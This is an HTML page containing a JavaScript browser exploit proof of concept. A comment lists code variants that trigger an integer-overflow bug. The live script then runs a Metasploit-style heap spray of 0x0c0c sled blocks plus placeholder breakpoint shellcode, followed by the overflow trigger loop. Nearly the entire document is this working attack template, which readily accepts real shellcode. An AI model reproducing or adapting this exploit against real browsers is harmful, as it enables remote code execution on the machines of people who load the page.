<html>
<head>
<script type="text/javascript">

/*

Code that triggers the vulnerability and some variants:

var obj = [0x3fFFffFF];
while(true)
  obj[0]++;

var obj = [0x40070000];
while(true)
  obj[0]--;

var obj = new Object();
obj.val = 0x3FffFFffFFff;
while(true)
  obj.val++;

function obj(){ };
obj.val = 0xffFFffFF;
while(true)
  obj.val++;

*/

// heap spray code taken from the metasploit framework
var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
oneblock = unescape("%u0c0c%u0c0c");

var fullblock = oneblock;
while (fullblock.length < 0x100000) {
	fullblock += fullblock;
}

var sprayContainer = new Array();
var sprayready = false;
var ContainerIndex = 0;

function fill_function() {

	if(! sprayready) {
		var xi = 0;
		while (xi<25) {
			sprayContainer[ContainerIndex] = fullblock + shellcode;
			xi++; ContainerIndex++;
		}
	} else {
		var obj = [0x3fFFffFFffFF];
		while(true)
			(obj[0])++;
	}
	if(sprayContainer.length >= 250) {
		sprayready = true;
	}
}

setInterval("fill_function()", .5);

</script>
</head>
<body></body>
</html>